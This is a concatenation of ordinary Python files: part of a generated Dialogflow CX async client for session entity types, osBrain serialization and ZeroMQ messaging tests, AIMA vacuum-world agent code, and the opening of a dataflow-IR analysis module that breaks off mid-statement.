precedence if provided.
(2) If GOOGLE_API_USE_CLIENT_CERTIFICATE environment variable
is "true", then the ``client_cert_source`` property can be used
to provide client certificate for mutual TLS transport. If
not provided, the default SSL client certificate will be used if
present. If GOOGLE_API_USE_CLIENT_CERTIFICATE is "false" or not
set, no client certificate will be used.
Raises:
google.auth.exceptions.MutualTlsChannelError: If mutual TLS transport
creation failed for any reason.
"""
self._client = SessionEntityTypesClient(
credentials=credentials,
transport=transport,
client_options=client_options,
client_info=client_info,
)
async def list_session_entity_types(
self,
request: Union[session_entity_type.ListSessionEntityTypesRequest, dict] = None,
*,
parent: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> pagers.ListSessionEntityTypesAsyncPager:
r"""Returns the list of all session entity types in the
specified session.
.. code-block:: python
from google.cloud import dialogflowcx_v3beta1
def sample_list_session_entity_types():
# Create a client
client = dialogflowcx_v3beta1.SessionEntityTypesClient()
# Initialize request argument(s)
request = dialogflowcx_v3beta1.ListSessionEntityTypesRequest(
parent="parent_value",
)
# Make the request
page_result = client.list_session_entity_types(request=request)
# Handle the response
for response in page_result:
print(response)
Args:
request (Union[google.cloud.dialogflowcx_v3beta1.types.ListSessionEntityTypesRequest, dict]):
The request object. The request message for
[SessionEntityTypes.ListSessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.ListSessionEntityTypes].
parent (:class:`str`):
Required. The session to list all session entity types
from. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>``
or
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>``.
If ``Environment ID`` is not specified, we assume
default 'draft' environment.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.services.session_entity_types.pagers.ListSessionEntityTypesAsyncPager:
The response message for
[SessionEntityTypes.ListSessionEntityTypes][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.ListSessionEntityTypes].
Iterating over this object will yield results and
resolve additional pages automatically.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = session_entity_type.ListSessionEntityTypesRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.list_session_entity_types,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# This method is paged; wrap the response in a pager, which provides
# an `__aiter__` convenience method.
response = pagers.ListSessionEntityTypesAsyncPager(
method=rpc, request=request, response=response, metadata=metadata,
)
# Done; return the response.
return response
async def get_session_entity_type(
self,
request: Union[session_entity_type.GetSessionEntityTypeRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> session_entity_type.SessionEntityType:
r"""Retrieves the specified session entity type.
.. code-block:: python
from google.cloud import dialogflowcx_v3beta1
def sample_get_session_entity_type():
# Create a client
client = dialogflowcx_v3beta1.SessionEntityTypesClient()
# Initialize request argument(s)
request = dialogflowcx_v3beta1.GetSessionEntityTypeRequest(
name="name_value",
)
# Make the request
response = client.get_session_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.dialogflowcx_v3beta1.types.GetSessionEntityTypeRequest, dict]):
The request object. The request message for
[SessionEntityTypes.GetSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.GetSessionEntityType].
name (:class:`str`):
Required. The name of the session entity type. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
or
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
If ``Environment ID`` is not specified, we assume
default 'draft' environment.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
Session entity types are referred to as **User** entity types and are
entities that are built for an individual user such
as favorites, preferences, playlists, and so on.
You can redefine a session entity type at the session
level to extend or replace a [custom entity
type][google.cloud.dialogflow.cx.v3beta1.EntityType]
at the user session level (we refer to the entity
types defined at the agent level as "custom entity
types").
Note: session entity types apply to all queries,
regardless of the language.
For more information about entity types, see the
[Dialogflow
documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = session_entity_type.GetSessionEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.get_session_entity_type,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def create_session_entity_type(
self,
request: Union[
gcdc_session_entity_type.CreateSessionEntityTypeRequest, dict
] = None,
*,
parent: str = None,
session_entity_type: gcdc_session_entity_type.SessionEntityType = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_session_entity_type.SessionEntityType:
r"""Creates a session entity type.
.. code-block:: python
from google.cloud import dialogflowcx_v3beta1
def sample_create_session_entity_type():
# Create a client
client = dialogflowcx_v3beta1.SessionEntityTypesClient()
# Initialize request argument(s)
session_entity_type = dialogflowcx_v3beta1.SessionEntityType()
session_entity_type.name = "name_value"
session_entity_type.entity_override_mode = "ENTITY_OVERRIDE_MODE_SUPPLEMENT"
session_entity_type.entities.value = "value_value"
session_entity_type.entities.synonyms = ['synonyms_value_1', 'synonyms_value_2']
request = dialogflowcx_v3beta1.CreateSessionEntityTypeRequest(
parent="parent_value",
session_entity_type=session_entity_type,
)
# Make the request
response = client.create_session_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.dialogflowcx_v3beta1.types.CreateSessionEntityTypeRequest, dict]):
The request object. The request message for
[SessionEntityTypes.CreateSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.CreateSessionEntityType].
parent (:class:`str`):
Required. The session to create a session entity type
for. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>``
or
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>``.
If ``Environment ID`` is not specified, we assume
default 'draft' environment.
This corresponds to the ``parent`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
session_entity_type (:class:`google.cloud.dialogflowcx_v3beta1.types.SessionEntityType`):
Required. The session entity type to
create.
This corresponds to the ``session_entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
Session entity types are referred to as **User** entity types and are
entities that are built for an individual user such
as favorites, preferences, playlists, and so on.
You can redefine a session entity type at the session
level to extend or replace a [custom entity
type][google.cloud.dialogflow.cx.v3beta1.EntityType]
at the user session level (we refer to the entity
types defined at the agent level as "custom entity
types").
Note: session entity types apply to all queries,
regardless of the language.
For more information about entity types, see the
[Dialogflow
documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([parent, session_entity_type])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = gcdc_session_entity_type.CreateSessionEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if parent is not None:
request.parent = parent
if session_entity_type is not None:
request.session_entity_type = session_entity_type
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.create_session_entity_type,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", request.parent),)),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def update_session_entity_type(
self,
request: Union[
gcdc_session_entity_type.UpdateSessionEntityTypeRequest, dict
] = None,
*,
session_entity_type: gcdc_session_entity_type.SessionEntityType = None,
update_mask: field_mask_pb2.FieldMask = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> gcdc_session_entity_type.SessionEntityType:
r"""Updates the specified session entity type.
.. code-block:: python
from google.cloud import dialogflowcx_v3beta1
def sample_update_session_entity_type():
# Create a client
client = dialogflowcx_v3beta1.SessionEntityTypesClient()
# Initialize request argument(s)
session_entity_type = dialogflowcx_v3beta1.SessionEntityType()
session_entity_type.name = "name_value"
session_entity_type.entity_override_mode = "ENTITY_OVERRIDE_MODE_SUPPLEMENT"
session_entity_type.entities.value = "value_value"
session_entity_type.entities.synonyms = ['synonyms_value_1', 'synonyms_value_2']
request = dialogflowcx_v3beta1.UpdateSessionEntityTypeRequest(
session_entity_type=session_entity_type,
)
# Make the request
response = client.update_session_entity_type(request=request)
# Handle the response
print(response)
Args:
request (Union[google.cloud.dialogflowcx_v3beta1.types.UpdateSessionEntityTypeRequest, dict]):
The request object. The request message for
[SessionEntityTypes.UpdateSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.UpdateSessionEntityType].
session_entity_type (:class:`google.cloud.dialogflowcx_v3beta1.types.SessionEntityType`):
Required. The session entity type to update. Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
or
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
If ``Environment ID`` is not specified, we assume
default 'draft' environment.
This corresponds to the ``session_entity_type`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
update_mask (:class:`google.protobuf.field_mask_pb2.FieldMask`):
The mask to control which fields get
updated.
This corresponds to the ``update_mask`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
Returns:
google.cloud.dialogflowcx_v3beta1.types.SessionEntityType:
Session entity types are referred to as **User** entity types and are
entities that are built for an individual user such
as favorites, preferences, playlists, and so on.
You can redefine a session entity type at the session
level to extend or replace a [custom entity
type][google.cloud.dialogflow.cx.v3beta1.EntityType]
at the user session level (we refer to the entity
types defined at the agent level as "custom entity
types").
Note: session entity types apply to all queries,
regardless of the language.
For more information about entity types, see the
[Dialogflow
documentation](\ https://cloud.google.com/dialogflow/docs/entities-overview).
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([session_entity_type, update_mask])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = gcdc_session_entity_type.UpdateSessionEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if session_entity_type is not None:
request.session_entity_type = session_entity_type
if update_mask is not None:
request.update_mask = update_mask
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.update_session_entity_type,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata(
(("session_entity_type.name", request.session_entity_type.name),)
),
)
# Send the request.
response = await rpc(request, retry=retry, timeout=timeout, metadata=metadata,)
# Done; return the response.
return response
async def delete_session_entity_type(
self,
request: Union[session_entity_type.DeleteSessionEntityTypeRequest, dict] = None,
*,
name: str = None,
retry: OptionalRetry = gapic_v1.method.DEFAULT,
timeout: float = None,
metadata: Sequence[Tuple[str, str]] = (),
) -> None:
r"""Deletes the specified session entity type.
.. code-block:: python
from google.cloud import dialogflowcx_v3beta1
def sample_delete_session_entity_type():
# Create a client
client = dialogflowcx_v3beta1.SessionEntityTypesClient()
# Initialize request argument(s)
request = dialogflowcx_v3beta1.DeleteSessionEntityTypeRequest(
name="name_value",
)
# Make the request
client.delete_session_entity_type(request=request)
Args:
request (Union[google.cloud.dialogflowcx_v3beta1.types.DeleteSessionEntityTypeRequest, dict]):
The request object. The request message for
[SessionEntityTypes.DeleteSessionEntityType][google.cloud.dialogflow.cx.v3beta1.SessionEntityTypes.DeleteSessionEntityType].
name (:class:`str`):
Required. The name of the session entity type to delete.
Format:
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``
or
``projects/<Project ID>/locations/<Location ID>/agents/<Agent ID>/environments/<Environment ID>/sessions/<Session ID>/entityTypes/<Entity Type ID>``.
If ``Environment ID`` is not specified, we assume
default 'draft' environment.
This corresponds to the ``name`` field
on the ``request`` instance; if ``request`` is provided, this
should not be set.
retry (google.api_core.retry.Retry): Designation of what errors, if any,
should be retried.
timeout (float): The timeout for this request.
metadata (Sequence[Tuple[str, str]]): Strings which should be
sent along with the request as metadata.
"""
# Create or coerce a protobuf request object.
# Quick check: If we got a request object, we should *not* have
# gotten any keyword arguments that map to the request.
has_flattened_params = any([name])
if request is not None and has_flattened_params:
raise ValueError(
"If the `request` argument is set, then none of "
"the individual field arguments should be set."
)
request = session_entity_type.DeleteSessionEntityTypeRequest(request)
# If we have keyword arguments corresponding to fields on the
# request, apply these.
if name is not None:
request.name = name
# Wrap the RPC method; this adds retry and timeout information,
# and friendly error handling.
rpc = gapic_v1.method_async.wrap_method(
self._client._transport.delete_session_entity_type,
default_timeout=None,
client_info=DEFAULT_CLIENT_INFO,
)
# Certain fields should be provided within the metadata header;
# add these here.
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("name", request.name),)),
)
# Send the request.
await rpc(
request, retry=retry, timeout=timeout, metadata=metadata,
)
async def __aenter__(self):
return self
async def __aexit__(self, exc_type, exc, tb):
await self.transport.close()
try:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo(
gapic_version=pkg_resources.get_distribution(
"google-cloud-dialogflowcx",
).version,
)
except pkg_resources.DistributionNotFound:
DEFAULT_CLIENT_INFO = gapic_v1.client_info.ClientInfo()
__all__ = ("SessionEntityTypesAsyncClient",)
| |
import json
import pickle
import time
import pytest
import zmq
import osbrain
from osbrain import run_agent
from osbrain.address import AgentAddressSerializer
from osbrain.agent import TOPIC_SEPARATOR
from osbrain.agent import compose_message
from osbrain.agent import deserialize_message
from osbrain.agent import serialize_message
from osbrain.helper import wait_agent_attr
from .common import echo_handler
from .common import set_received
def test_compose_message():
"""
Test correct message composing.
"""
message = b'message'
topic = b'test topic'
# Basic composing
for serializer in AgentAddressSerializer.SERIALIZER_SIMPLE:
serializer = AgentAddressSerializer(serializer)
assert compose_message(message, topic, serializer) == topic + message
for serializer in AgentAddressSerializer.SERIALIZER_SEPARATOR:
serializer = AgentAddressSerializer(serializer)
assert (
compose_message(message, topic, serializer)
== topic + TOPIC_SEPARATOR + message
)
# Raise with wrong serializer
with pytest.raises(Exception):
compose_message(message, topic, 'foo')
@pytest.mark.parametrize(
'agent_serial,socket_serial,result',
[
(None, None, osbrain.config['SERIALIZER']),
('raw', None, 'raw'),
('pickle', None, 'pickle'),
(None, 'raw', 'raw'),
(None, 'json', 'json'),
('pickle', 'json', 'json'),
],
)
def test_correct_serialization(nsproxy, agent_serial, socket_serial, result):
"""
Test that the right serializer is being used when using the different
initialization options.
"""
agent = run_agent('a0', serializer=agent_serial)
addr = agent.bind('PUB', serializer=socket_serial)
assert addr.serializer == result
def test_serialize_message():
"""
Test basic serialization.
"""
# Raw serialization
test = b'asdf'
message = serialize_message(message=test, serializer='raw')
assert isinstance(message, bytes)
assert test == message
# Pickle serialization
test = [0, 1]
message = serialize_message(message=test, serializer='pickle')
assert isinstance(message, bytes)
assert test == pickle.loads(message)
# Json serialization
test = [0, 1]
message = serialize_message(message=test, serializer='json')
assert isinstance(message, bytes)
assert test == json.loads(message.decode('ascii'))
# Un-serializable type
with pytest.raises(TypeError):
serialize_message(message=b'Hello', serializer='json')
# Incorrect serializer
with pytest.raises(ValueError):
serialize_message(message=test, serializer='foo')
def test_deserialize_message():
"""
Test basic deserialization.
"""
# Raw deserialization
test = b'asdf'
assert test == deserialize_message(message=test, serializer='raw')
# Pickle deserialization
test = [0, 1]
assert test == deserialize_message(
message=pickle.dumps(test, -1), serializer='pickle'
)
# Json deserialization
assert test == deserialize_message(
message=json.dumps(test).encode('ascii'), serializer='json'
)
# Incorrect serializer
with pytest.raises(ValueError):
deserialize_message(message=b'x', serializer='foo')
@pytest.mark.parametrize(
'serializer, message, response',
[
('raw', b'Hello world', b'OK'),
('pickle', 'Hello world', 'OK'),
('json', 'Hello world', 'OK'),
],
)
def test_reqrep(nsproxy, serializer, message, response):
"""
Simple request-reply pattern between two agents with different
serializations.
"""
def rep_handler(agent, message):
return response
a0 = run_agent('a0')
a1 = run_agent('a1')
addr = a0.bind('REP', 'reply', rep_handler, serializer=serializer)
a1.connect(addr, 'request')
assert a1.send_recv('request', message) == response
def test_reqrep_raw_zmq_outside(nsproxy):
"""
Simple request-reply pattern between an agent and a direct ZMQ connection.
"""
# Create an osBrain agent that will receive the message
a1 = run_agent('a1')
a1.set_attr(received=None)
addr = a1.bind(
'REP', transport='tcp', handler=echo_handler, serializer='raw'
)
# Create a raw ZeroMQ REQ socket
context = zmq.Context()
socket = context.socket(zmq.REQ)
socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
# Send the message
message = b'Hello world'
socket.send(message)
assert socket.recv() == message
socket.close()
context.destroy()
@pytest.mark.parametrize(
'serializer, message',
[
('raw', b'Hello world'),
('pickle', 'Hello world'),
('json', 'Hello world'),
],
)
def test_pushpull(nsproxy, serializer, message):
"""
Simple push-pull pattern test, using different serializations.
"""
a0 = run_agent('a0')
a1 = run_agent('a1')
a1.set_attr(received=None)
addr = a1.bind('PULL', handler=set_received, serializer=serializer)
a0.connect(addr, 'push')
a0.send('push', message)
assert wait_agent_attr(a1, name='received', value=message)
def test_pushpull_raw_zmq_outside(nsproxy):
"""
Simple push-pull pattern test. Channel without serialization.
The message is sent from outside osBrain, through a ZMQ PUSH socket.
"""
# Create an osBrain agent that will receive the message
a1 = run_agent('a1')
a1.set_attr(received=None)
addr = a1.bind(
'PULL', transport='tcp', handler=set_received, serializer='raw'
)
# Create a raw ZeroMQ PUSH socket
context = zmq.Context()
socket = context.socket(zmq.PUSH)
socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
# Send the message
message = b'Hello world'
socket.send(message)
assert wait_agent_attr(a1, name='received', value=message)
socket.close()
context.destroy()
@pytest.mark.parametrize(
'serializer, message',
[
('raw', b'Hello world'),
('pickle', 'Hello world'),
('json', 'Hello world'),
],
)
def test_pubsub(nsproxy, serializer, message):
"""
Simple publisher-subscriber pattern test with different serializations.
"""
a0 = run_agent('a0')
a1 = run_agent('a1')
a1.set_attr(received=None)
addr = a0.bind('PUB', alias='pub', serializer=serializer)
a1.connect(addr, handler=set_received)
while not a1.get_attr('received'):
a0.send('pub', message)
time.sleep(0.1)
assert a1.get_attr('received') == message
def test_pubsub_raw_zmq_outside(nsproxy):
"""
Simple publisher-subscriber pattern test. Channel without serialization.
The message is sent from outside osBrain, through a ZMQ PUB socket.
"""
# Create an osBrain agent that will receive the message
a1 = run_agent('a1')
a1.set_attr(received=None)
addr = a1.bind(
'SUB', transport='tcp', handler=set_received, serializer='raw'
)
# Create a raw ZeroMQ PUB socket
context = zmq.Context()
socket = context.socket(zmq.PUB)
socket.connect('tcp://%s:%s' % (addr.address.host, addr.address.port))
# Send the message
message = b'Hello world'
while not a1.get_attr('received'):
socket.send(message)
time.sleep(0.01)
assert a1.get_attr('received') == message
socket.close()
context.destroy()
| |
import agents as ag
import envgui as gui
import random
# ______________________________________________________________________________
loc_A, loc_B = (1, 1), (2, 1) # The two locations for the Vacuum world
def RandomVacuumAgent():
"Randomly choose one of the actions from the vacuum environment."
p = ag.RandomAgentProgram(['Right', 'Left', 'Up', 'Down', 'Suck', 'NoOp'])
return ag.Agent(p)
def TableDrivenVacuumAgent():
"[Figure 2.3]"
table = {((loc_A, 'Clean'),): 'Right',
((loc_A, 'Dirty'),): 'Suck',
((loc_B, 'Clean'),): 'Left',
((loc_B, 'Dirty'),): 'Suck',
((loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Clean')): 'Right',
((loc_A, 'Clean'), (loc_A, 'Clean'), (loc_A, 'Dirty')): 'Suck',
# ...
}
p = ag.TableDrivenAgentProgram(table)
return ag.Agent()
def ReflexVacuumAgent():
"A reflex agent for the two-state vacuum environment. [Figure 2.8]"
def program(percept):
location, status = percept
if status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return ag.Agent(program)
def ModelBasedVacuumAgent() -> object:
"An agent that keeps track of what locations are clean or dirty."
model = {loc_A: None, loc_B: None}
def program(percept):
"Same as ReflexVacuumAgent, except if everything is clean, do NoOp."
location, status = percept
model[location] = status # Update the model here
if model[loc_A] == model[loc_B] == 'Clean':
return 'NoOp'
elif status == 'Dirty':
return 'Suck'
elif location == loc_A:
return 'Right'
elif location == loc_B:
return 'Left'
return ag.Agent(program)
# ______________________________________________________________________________
# Vacuum environment
class Dirt(ag.Thing):
pass
# class Floor(ag.Thing):
# pass
class VacuumEnvironment(ag.XYEnvironment):
"""The environment of [Ex. 2.12]. Agent perceives dirty or clean,
and bump (into obstacle) or not; 2D discrete world of unknown size;
performance measure is 100 for each dirt cleaned, and -1 for
each turn taken."""
def __init__(self, width=4, height=3):
super(VacuumEnvironment, self).__init__(width, height)
self.add_walls()
def thing_classes(self):
return [ag.Wall, Dirt, ReflexVacuumAgent, RandomVacuumAgent,
TableDrivenVacuumAgent, ModelBasedVacuumAgent]
def percept(self, agent):
"""The percept is a tuple of ('Dirty' or 'Clean', 'Bump' or 'None').
Unlike the TrivialVacuumEnvironment, location is NOT perceived."""
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
bump = ('Bump' if agent.bump else'None')
return (bump, status)
def execute_action(self, agent, action):
if action == 'Suck':
dirt_list = self.list_things_at(agent.location, Dirt)
if dirt_list != []:
dirt = dirt_list[0]
agent.performance += 100
self.delete_thing(dirt)
else:
super(VacuumEnvironment, self).execute_action(agent, action)
if action != 'NoOp':
agent.performance -= 1
class TrivialVacuumEnvironment(VacuumEnvironment):
"""This environment has two locations, A and B. Each can be Dirty
or Clean. The agent perceives its location and the location's
status. This serves as an example of how to implement a simple
Environment."""
def __init__(self):
super(TrivialVacuumEnvironment, self).__init__()
choice = random.randint(0, 3)
if choice % 2: # 1 or 3
self.add_thing(Dirt(), loc_A)
if choice > 1: # 2 or 3
self.add_thing(Dirt(), loc_B)
def percept(self, agent):
"Returns the agent's location, and the location status (Dirty/Clean)."
status = ('Dirty' if self.some_things_at(
agent.location, Dirt) else 'Clean')
return (agent.location, status)
#
# def execute_action(self, agent, action):
# """Change agent's location and/or location's status; track performance.
# Score 10 for each dirt cleaned; -1 for each move."""
# if action == 'Right':
# agent.location = loc_B
# agent.performance -= 1
# elif action == 'Left':
# agent.location = loc_A
# agent.performance -= 1
# elif action == 'Suck':
# if self.status[agent.location] == 'Dirty':
# agent.performance += 10
# self.status[agent.location] = 'Clean'
#
def add_agent(self, a):
"Agents start in either location at random."
super().add_thing(a, random.choice([loc_A, loc_B]))
# _________________________________________________________________________
# >>> a = ReflexVacuumAgent()
# >>> a.program((loc_A, 'Clean'))
# 'Right'
# >>> a.program((loc_B, 'Clean'))
# 'Left'
# >>> a.program((loc_A, 'Dirty'))
# 'Suck'
# >>> a.program((loc_A, 'Dirty'))
# 'Suck'
#
# >>> e = TrivialVacuumEnvironment()
# >>> e.add_thing(ModelBasedVacuumAgent())
# >>> e.run(5)
# Produces text-based status output
# v = TrivialVacuumEnvironment()
# a = ModelBasedVacuumAgent()
# a = ag.TraceAgent(a)
# v.add_agent(a)
# v.run(10)
# Launch GUI of Trivial Environment
# v = TrivialVacuumEnvironment()
# a = RandomVacuumAgent()
# a = ag.TraceAgent(a)
# v.add_agent(a)
# g = gui.EnvGUI(v, 'Vaccuum')
# c = g.getCanvas()
# c.mapImageNames({
# Dirt: 'images/dirt.png',
# ag.Wall: 'images/wall.jpg',
# # Floor: 'images/floor.png',
# ag.Agent: 'images/vacuum.png',
# })
# c.update()
# g.mainloop()
# Launch GUI of more complex environment
v = VacuumEnvironment(5, 4)
#a = ModelBasedVacuumAgent()
a = RandomVacuumAgent()
a = ag.TraceAgent(a)
loc = v.random_location_inbounds()
v.add_thing(a, location=loc)
v.scatter_things(Dirt)
g = gui.EnvGUI(v, 'Vaccuum')
c = g.getCanvas()
c.mapImageNames({
ag.Wall: './submissions/Colburn/Myface.jpg',
# Floor: 'images/floor.png',
Dirt: 'images/dirt.png',
ag.Agent: 'images/vacuum.png',
})
c.update()
g.mainloop()
| |
# Copyright 2011 Nicholas Bray
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from util.typedispatch import *
from language.python import ast
from analysis.dataflowIR import graph
from analysis.storegraph import storegraph
from analysis.dataflowIR.transform import dce
class AbstractState(object):
def __init__(self, hyperblock, predicate):
assert predicate.hyperblock is hyperblock
self.hyperblock = hyperblock
self.predicate = predicate
self.slots = {}
def freeze(self):
pass
def split(self, predicates):
return [State(self.hyperblock, predicate, self) for predicate in predicates]
def get(self, slot):
if slot not in self.slots:
result = self.generate(slot)
self.slots[slot] = result
else:
result = self.slots[slot]
return result
def generate(self, slot):
raise NotImplementedError
class State(AbstractState):
def __init__(self, hyperblock, predicate, parent):
AbstractState.__init__(self, hyperblock, predicate)
self.parent = parent
self.frozen = False
assert self.parent.hyperblock is self.hyperblock
parent.freeze()
def freeze(self):
self.frozen = True
def generate(self, slot):
return self.parent.get(slot)
def set(self, slot, value):
assert not self.frozen
self.slots[slot] = value
def gate(pred, value):
gate = graph.Gate(pred.hyperblock)
gate.setPredicate(pred)
gate.addRead(value)
if isinstance(value, graph.ExistingNode):
result = graph.LocalNode(pred.hyperblock)
else:
result = value.duplicate()
gate.addModify(result)
result = gate.modify
return result
def gatedMerge(hyperblock, pairs):
if len(pairs) == 1:
assert False, "single gated merge?"
pred, value = pairs[0]
result = gate(pred, value)
else:
m = graph.Merge(hyperblock)
result = pairs[0][1].duplicate()
result.hyperblock = hyperblock
m.modify = result.addDefn(m)
for pred, value in pairs:
# Create the gate
# TODO will the predicate always have the right hyperblock?
temp = gate(pred, value)
# Merge the gate
m.addRead(temp)
result = m.modify
return result
class DeferedMerge(AbstractState):
def __init__(self, hyperblock, predicate, states):
AbstractState.__init__(self, hyperblock, predicate)
self.states = states
def generate(self, slot):
slots = [state.get(slot) for state in self.states]
unique = set(slots)
if len(unique) == 1:
return unique.pop()
pairs = [(state.predicate, state.get(slot)) for state in self.states]
return gatedMerge(self.hyperblock, pairs)
class DeferedEntryPoint(AbstractState):
def __init__(self, hyperblock, predicate, code, dataflow):
AbstractState.__init__(self, hyperblock, predicate)
self.code = code
self.dataflow = dataflow
def generate(self, slot):
if isinstance(slot, ast.Local):
# Parameters are explicitly set.
# If it isn't already here, it's an undefined local.
return self.dataflow.null
elif isinstance(slot, ast.Existing):
return self.dataflow.getExisting(slot)
else:
# Fields from killed object cannot come from beyond the entry point.
killed = self.code.annotation.killed.merged
if slot.object in killed:
